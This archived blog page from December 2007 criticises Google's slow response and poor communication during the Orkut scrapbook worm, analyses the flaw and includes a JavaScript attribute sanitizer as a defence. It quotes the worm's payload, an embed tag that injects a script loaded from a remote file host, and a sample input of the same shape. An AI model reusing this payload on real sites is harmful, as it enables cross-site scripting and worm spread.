Privacy: December 2007 Archives

Orkut finally posted a notice about the worm. I certainly appreciate that they worked quickly on fixing the problem. However, I still believe there should have been an ongoing dialog with their users. When you put together a security response plan, you need to include not only an engineering team, but also P.R. resources to handle communicating with the outside world. "Trust" is the most important commodity a social network has. The panic you feel when you think your accounts, and perhaps computer, are infected is not going to be erased by an after-the-fact message two days later. All social networks should have a plan in place that includes (at a minimum) telling people that a solution is being developed, and ideally includes periodic updates on the progress. Providing additional information about the problem as it becomes available would also be great, but the primary goal is to show that users' concerns are being taken seriously, and that people are actively working to fix the problem. Responsiveness, concern, and information will help ensure that people maintain their trust in your service.

Security Reminder Orkut Blog

Security Reminder



This week, the orkut team discovered that a user had exploited a bug in our scrapbook feature. As a result, many of you likely received scraps from friends of yours that they actually didn't send, and friends may have received scraps that appeared to come from you.

The orkut team responded quickly, and worked late into the night to fix the underlying issue and contain the spread of these scraps.

We believe that this action has been effectively stopped and you should no longer receive any more of these unintended messages. We appreciate your understanding in this case and hope that this did not create too much of an inconvenience for you or your fellow orkut friends.

I had to head off and get some sleep last night, so I didn't have time to try and track this down, but others did. I've attached the javascript code below for those who want to see it.

I have to say, I'm disappointed by Google's response time on this issue. I noticed the problem Tuesday evening around 10 or 11pm EST. As soon as I knew it was a worm I posted a support request to Orkut (which, btw, is not easy—they keep redirecting you to tips on protecting your computer). Once I had more details and posted my original link, I filed another report, this time through a security form (although the only way to do so was to claim that my account had been compromised). That was between midnight and 1am EST. This morning when I went to check around 7am EST, the worm was still spreading.

I would have hoped that they could have gotten the reports, paged the appropriate people, and then turned off scrapbooks, or disabled HTML scrapbooks, until things were under control. If that wasn't possible (and I understand that making on-the-fly code changes to a large distributed system is not always the simplest thing), then they should have shut Orkut down. And at the very least, I would expect to see an explanation and apology on Orkut.

The issue isn't whether or not the worm was dangerous. The issue is that I now don't trust Google to respond quickly the next time there's a worm. And the next one might not be so benign.

Ironically, this has caused a number of my friends (who like myself, haven't used Orkut in quite a while) to update their profiles. It may even increase Orkut's overall traffic in the States, since they've largely been forgotten here.

The original source file is no longer in place, so the worm has hopefully stopped. Since Google has posted nothing about it on the Orkut site or blog, I have no idea whether the underlying flaw has been fixed.

Looking at the code, my guess is that the hole is here:

"[/silver]<br/><embed src=\"http://www.orkut.com/LoL.aspx\" type=\"application/x-shockwave-flash\" wmode=\"transparent'); script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';document.getElementsByTagName('head')[0].appendChild(script);escape('\"width=\"1\" height=\"1\"></embed>";

There is a "script" attribute provided to the embed of a Flash video. Letting the script element through allowed for arbitrary JavaScript execution in the context of the scrapbook page. Definitely not a good thing. It would certainly be possible for such a script to do quite a bit of damage. I'm sure there are more detailed examinations of the problem on the net. Searching around, it's clear that this is probably the third variation of the exploit that has been used in recent days.

Javascript code can be found below the fold.
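The wmode value in the snippet quoted above carries JavaScript where only one of three fixed keywords is legitimate. The following is an added example (not the worm's code and not Orkut's) of allowlist validation for user-supplied embed attributes; the allowed host, the policy table and the sample inputs are assumptions constructed for illustration, and the attributes are assumed to come from a real HTML parser.

```javascript
// Added example; ALLOWED_HOSTS and POLICY are assumptions, not Orkut's rules.
const ALLOWED_HOSTS = new Set(["video.example.com"]); // hypothetical host

// A Map avoids inherited keys such as "constructor" matching by accident.
const POLICY = new Map([
  ["src", (v) => {
    try {
      const u = new URL(v);
      return u.protocol === "https:" && ALLOWED_HOSTS.has(u.hostname);
    } catch {
      return false;
    }
  }],
  ["type", (v) => v === "application/x-shockwave-flash"],
  ["wmode", (v) => ["window", "opaque", "transparent"].includes(v)],
  ["width", (v) => /^[0-9]{1,4}$/.test(v)],
  ["height", (v) => /^[0-9]{1,4}$/.test(v)],
]);

function escapeAttr(v) {
  return v.replace(/&/g, "&amp;").replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;").replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// attrs: name -> value pairs from an HTML parser. Any unknown, duplicate or
// invalid attribute rejects the whole tag instead of being "cleaned up".
function sanitizeEmbed(attrs) {
  const clean = new Map();
  const rejected = [];
  for (const [rawName, value] of Object.entries(attrs)) {
    const name = rawName.toLowerCase();
    const check = POLICY.get(name);
    const valid = check && typeof value === "string" && check(value);
    if (valid && !clean.has(name)) clean.set(name, value);
    else rejected.push(rawName);
  }
  if (rejected.length > 0 || !clean.has("src")) {
    return { ok: false, html: "", rejected };
  }
  const html = "<embed " + [...POLICY.keys()].filter((k) => clean.has(k))
    .map((k) => `${k}="${escapeAttr(clean.get(k))}"`).join(" ") + ">";
  return { ok: true, html, rejected };
}

// Constructed samples. BAD mirrors the shape of the wmode value quoted above.
const GOOD = { src: "https://video.example.com/clip.swf", wmode: "transparent",
  type: "application/x-shockwave-flash", width: "320", height: "240" };
const BAD = { ...GOOD, wmode: "transparent'); injected(); escape('" };
```

Rejecting the whole tag on the first bad attribute is deliberate: trying to repair a value keeps the parser and the sanitizer arguing about where the value ends.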

About this Archive

This page is an archive of entries in the Privacy category from December 2007.


About Me

I'm the CEO/CTO of Somewhere, Inc., a company building a unified social networking layer that gives people the means to track their friends across multiple social networks.
This weblog is licensed under a Creative Commons License.